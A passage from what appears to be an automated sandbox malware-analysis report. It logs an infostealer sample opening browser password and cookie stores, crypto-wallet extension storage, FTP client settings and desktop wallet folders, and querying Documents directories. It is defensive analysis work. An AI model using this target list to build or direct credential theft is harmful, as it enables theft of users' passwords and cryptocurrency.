      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
